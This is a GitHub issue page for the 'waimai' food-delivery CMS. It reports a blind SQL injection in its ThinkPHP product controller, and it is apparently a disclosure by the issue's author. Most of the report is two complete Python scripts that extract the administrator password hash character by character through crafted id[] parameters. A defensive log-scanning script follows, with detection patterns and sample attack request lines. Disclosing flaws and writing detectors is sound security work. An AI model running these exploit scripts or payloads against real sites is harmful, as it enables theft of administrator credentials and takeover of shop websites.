caokang / waimai

超级外卖 Super Cms is a professional food-delivery ordering system. With it you manage the website without writing any code; being able to type is enough. The front end is built with HTML5 and CSS3, is compatible with IE6+, Firefox, Chrome, Safari, Opera and other mainstream browsers, and displays correctly inside Weibo and WeChat. The back end uses a modular design and is easy for users to operate: easy to learn, install it and it is ready to use. Suitable for restaurants, hotels, delivery platforms, pastry shops and seafood shops. [This address is used for maintenance]; for detailed issues, see the link.
MIT License

There is a SQL Injection vulnerability #9

Open m4yfly opened 5 years ago

m4yfly commented 5 years ago

There is a blind SQL injection.

waimaiCMS is based on ThinkPHP 3.1.3; the vulnerable code is in web/Lib/Action/ProductAction.class.php:

    public function index(){
        $data['fid'] = I('id'); // shop category
        $Food = M('Food');
        $fooditem = $Food->where($data)->find();
        $this->assign('fooditem', $fooditem);
        $this->display();
    }

Exploit to get the admin password:

    #!/usr/bin/env python2
    #coding:utf-8
    import requests
    import string

    password = ''
    string_list = string.ascii_lowercase + string.digits

    url = "http://localhost:8000/"
    prefix = "product?id[0]=in%20(%27xx%27))%20or%20substr((select%20userpass%20from%20sn_members%20where%20uid=1),1,"
    payload = ")=%27"
    suffix = "%27%20--%20"

    for i in range(32):
        for s in string_list:
            final_url = url + prefix + str(i+1) + payload + password + s + suffix
            res = requests.get(final_url)
            if '<img src=""' not in res.content:
                password += s
                continue
        print password

m4yfly commented 5 years ago

If you test it on Linux, this will be helpful:

    #!/usr/bin/env python2
    #coding:utf-8
    import requests
    import string

    password = ''
    string_list = string.ascii_lowercase + string.digits

    url = "http://localhost"
    prefix = "/index.php?m=product&a=index&id[0]=in%20(%27xx%27))/*&id[1]=*/or%20substr((select%20userpass%20from%20sn_members%20where%20uid=1),1,"
    payload = ")=%27"
    suffix = "%27%20--%20&id[2]=exp"

    for i in range(32):
        for s in string_list:
            final_url = url + prefix + str(i+1) + payload + password + s + suffix
            res = requests.get(final_url)
            if '<img src=""' not in res.content:
                password += s
                continue
        print password
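A defender-side check for the request shape both scripts above rely on (an array-indexed `id` parameter whose element carries a ThinkPHP where() operator such as `in` or `exp`, or an SQL fragment), as an added example that is not part of the waimai project or the reporter's scripts. The access-log lines are constructed, and the operator list is an assumption based on ThinkPHP 3.x's array-condition syntax.

```python
"""Flag ThinkPHP array-where() injection attempts (id[0]=in ..., id[2]=exp) in access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# ThinkPHP 3.x where() operators accepted as element 0 of an array condition; 'exp' splices raw SQL.
THINKPHP_OPERATORS = ("not in", "not like", "between", "in", "exp", "like",
                      "eq", "neq", "gt", "egt", "lt", "elt")   # longest first
SQL_MARKERS = re.compile(r"--|/\*|\*/|\bselect\b|\bsubstr\b|\bunion\b", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def operator_prefix(value: str):
    """Return the where() operator a decoded value starts with, else None."""
    v = value.strip().lower()
    for op in THINKPHP_OPERATORS:
        if v == op or v.startswith(op + " ") or v.startswith(op + "("):
            return op
    return None

def analyze_request(target: str) -> list:
    """Findings for one request target as (param, kind, detail) tuples."""
    findings = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        if "[" not in name:          # scalar parameter: where() only ever sees a value
            continue
        base = name.split("[", 1)[0]
        for value in values:         # parse_qs has already percent-decoded them
            op = operator_prefix(value)
            if op:
                findings.append((base, "operator", op))
            if SQL_MARKERS.search(value):
                findings.append((base, "sql_fragment", value.strip()))
    return findings

def scan_access_log(lines) -> list:
    """Return (line_number, findings) for every log line that trips a check."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        findings = analyze_request(m.group(1)) if m else []
        if findings:
            hits.append((number, findings))
    return hits

LOG_LINES = [  # constructed common-log-format lines, not captured from a real host
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?m=product&a=index&id=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /product?id[0]=in%20(%27xx%27))%20or%201=1%20--%20 HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?m=product&a=index&id[0]=in%20(%27xx%27))/*&id[1]=*/or%201=1%20--%20&id[2]=exp HTTP/1.1" 200 4096',
]
```

The same `analyze_request` check, applied before the controller touches `I('id')`, is the server-side guard: any `id` that arrives as an array rather than a single integer should be rejected.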